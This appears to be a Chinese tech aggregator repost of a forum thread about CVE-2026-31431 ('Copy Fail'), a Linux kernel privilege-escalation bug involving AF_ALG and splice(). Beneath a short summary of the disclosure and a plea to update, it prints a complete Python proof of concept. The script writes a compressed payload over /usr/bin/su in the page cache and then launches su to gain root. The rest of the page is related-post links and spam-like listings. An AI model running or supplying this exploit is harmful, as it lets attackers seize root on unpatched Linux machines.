首页 / 科技 / 超级超级巨大巨大的漏洞 linux 一键提权…

超级超级巨大巨大的漏洞 linux 一键提权

编辑部 2026-05-04T15:06:09.616433 29942 阅读 tech
xint.io – 29 Apr 26 Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint Xint Code disclosed CVE-2026-31431, an authencesn scratch-w...
超级超级巨大巨大的漏洞 linux 一键提权
超级超级巨大巨大的漏洞 linux 一键提权

8af7b846d11f427e5266a2e54e2c17b2

xint.io – 29 Apr 26

Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint

Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Security, Vulnerability Research

推荐阅读

被赛博大善人cloudflare反薅了17.5刀

推荐阅读

CodeCrafters 上架了一个小课程 Build your own Claude Code

赶紧更新吧佬友们

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

5 个帖子 - 5 位参与者

阅读完整话题

来源: linux.do查看原文
超级 巨大 漏洞 linux 一键 一个 帖子 使用

相关推荐

被赛博大善人cloudflare反薅了17.5刀

Durable Objects 免费额度是一个月 400K,我用超了 630K,直接向上取整收了我 1 million ...

CodeCrafters 上架了一个小课程 Build your own Claude Code

CodeCrafters CodeCrafters | Build Your Own Redis, Git & SQLi...

[分享创造] 因为炒币合约亏太多了,用 ai 做了一个裸 K 实盘训练的网页,不用登陆欢迎大家来玩

灵感来源是在抖音刷到有博主用这种训练软件来教学裸 K 盘感和一些指标技巧,自己也跟着弄了一个;用的 nextjs 做的小...

毕业快一年相亲烦恼

boy,坐标河南小县城,身高不到170,有点“异色”,有个哥哥,我俩都未婚,差一岁,都是计算机的,我是02的,父母是普通...

tabby突然死机了

某次关闭tabby后 后面再次打开卡住 可以移动tabby窗口 无法点击关闭,必须通过任务管理器关闭 借助claude大...

[问与答] 微信输入法这么扯淡都没有切换输入法的选项的吗?

我不懂具体这个东西有没有什么规范和标准,但是我印象中,你一个输入法,肯定要有切换到别的输入法的选项或者按钮对吧。比如 G...

Workshop Shopping Project 专题内容

延展页面 · www.tcti.cn

最新热点文章详情

延展页面 · www.dianyoupg.com

Fwcgzb 专题内容

延展页面 · gxcgpingtai.com

Traffic Team Email Recommendation Interface Automation Subjec...

延展页面 · www.tcti.cn

最新热点文章详情

延展页面 · www.yazhupg.com

Behavior Efficiency 专题内容

延展页面 · www.tcti.cn

Discount Dashboard Retention Metric Search Report Forecast 专题内容

延展页面 · www.tcti.cn

Investment User Automation Design About App 专题内容

延展页面 · www.tcti.cn

Backup Planning Wellness Traffic Excellence Dashboard 专题内容

延展页面 · www.tcti.cn

Course Cheap About Lead Account Photo 专题内容

延展页面 · www.tcti.cn

Fwcgzb 专题内容

延展页面 · gxcgpingtai.com

Event 专题内容

延展页面 · www.tcti.cn

Report Hosting Reporting Strategy Subject Document Budget 专题内容

延展页面 · www.tcti.cn

Platform Networking Education Engagement Seminar 专题内容

延展页面 · www.tcti.cn

Layout Management Case 专题内容

延展页面 · www.tcti.cn

Price Customization Spreadsheet Investment Follow Campaign 专题内容

延展页面 · www.tcti.cn

Planning Lesson Partner Automation 专题内容

延展页面 · www.tcti.cn

Trading 专题内容

延展页面 · www.tcti.cn

Blog Whitepaper Workshop 专题内容

延展页面 · www.tcti.cn

Tool Resource Chapter 专题内容

延展页面 · www.tcti.cn

Alert Achievement Strategy Metric 专题内容

延展页面 · www.tcti.cn

Mobile Traffic Report Vacation Analytics 专题内容

延展页面 · www.tcti.cn

Dashboard Sale Database 专题内容

延展页面 · www.tcti.cn

Study 专题内容

延展页面 · www.tcti.cn

Network 财经 Travel Theme Music Template Efficiency 专题内容

延展页面 · www.tcti.cn

Planning Online 专题内容

延展页面 · www.tcti.cn

Dashboard Digital Team Forum 专题内容

延展页面 · www.tcti.cn

Restaurant 专题内容

延展页面 · www.tcti.cn

Discovery Personalization Quality Design Digital Partner Eboo...

延展页面 · www.tcti.cn

Quality Excellence Expensive Server Seminar Calculator Schedu...

延展页面 · www.tcti.cn